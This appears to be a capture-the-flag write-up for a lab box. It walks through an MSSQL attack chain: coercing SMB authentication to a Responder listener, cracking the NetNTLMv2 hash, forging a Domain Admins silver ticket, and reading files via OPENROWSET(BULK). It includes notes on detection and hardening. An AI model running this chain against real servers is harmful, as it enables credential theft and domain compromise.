Sign

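MSSQL: low-privileged SQL login to file reads via OPENROWSET(BULK)

Summary: no SQL Server bug is used here. A low-privileged SQL login makes the server authenticate to a listener, the captured NetNTLMv2 response of the service account is cracked offline, and the account's NT hash is then used to forge a Kerberos service ticket for the MSSQLSvc SPN. The chain stops at the cracking step if the service account has a long random password (for example a group managed service account).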

impacket-mssqlclient scott:Sm230#C5NatH@10.10.11.90

responder -I tun0

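SELECT '\10.10.14.206\share';

note: as extracted this statement only returns a string literal, and the UNC path has lost its leading backslash (\\10.10.14.206\share); the call that actually made the server open the share is not preserved on this page. A database server that is not allowed outbound SMB (TCP 445) to arbitrary hosts cannot give up its service account's NetNTLMv2 response this way.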

hashcat -m 5600 hashes.txt /home/kali/Desktop/wordlists/rockyou.txt

impacket-mssqlclient mssqlsvc:'purPLE9795!@'@10.10.11.90 -windows-auth

SELECT IS_SRVROLEMEMBER('sysadmin');

echo -n 'purPLE9795!@' | iconv -f UTF-8 -t UTF-16LE | openssl md4

result (MD4 of the UTF-16LE password, i.e. the account's NT hash): MD4(stdin)= ef699384c3285c54128a3ee1ddb1a0cc

IT_RID=1105
MSSQLSVC_RID=1103
DOMSID='S-1-5-21-4088429403-1159899800-2753317549'

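query used to look up the SID of the IT group (its last component is the RID above, the rest is the domain SID): SELECT SUSER_SID('SIGNED\IT');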

impacket-ticketer \
-nthash ef699384c3285c54128a3ee1ddb1a0cc \
-domain-sid "S-1-5-21-4088429403-1159899800-2753317549" \
-domain SIGNED.HTB \
-spn MSSQLSvc/DC01.SIGNED.HTB \
-groups 512,1105 \
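-user-id 1103 mssqlsvc

note: 512 is the Domain Admins RID and 1105 the IT group RID listed above. The ticket is built offline from the service account's NT hash, so the domain controller issues nothing for it. The trace this step leaves is a service ticket that reaches the SQL Server with no matching service-ticket request (event 4769) on the domain controller, or whose group list does not match the account's real memberships.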

export KRB5CCNAME="$(pwd)/mssqlsvc.ccache"

impacket-mssqlclient -k 'SIGNED.HTB/mssqlsvc@dc01.signed.htb' -windows-auth

SELECT * FROM OPENROWSET(BULK N'C:\Users\mssqlsvc\Desktop\user.txt', SINGLE_CLOB) AS t;

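SELECT * FROM OPENROWSET(BULK N'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) AS t;

note: OPENROWSET(BULK ...) requires ADMINISTER BULK OPERATIONS (or membership in bulkadmin or sysadmin). For a Windows-authenticated login the file is opened under that login's Windows security context, which is presumably why the group membership carried in the ticket decides which paths are readable. Granting bulk permissions only to the accounts that load data, and auditing OPENROWSET(BULK) against paths outside the import directories, limits and exposes this use.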
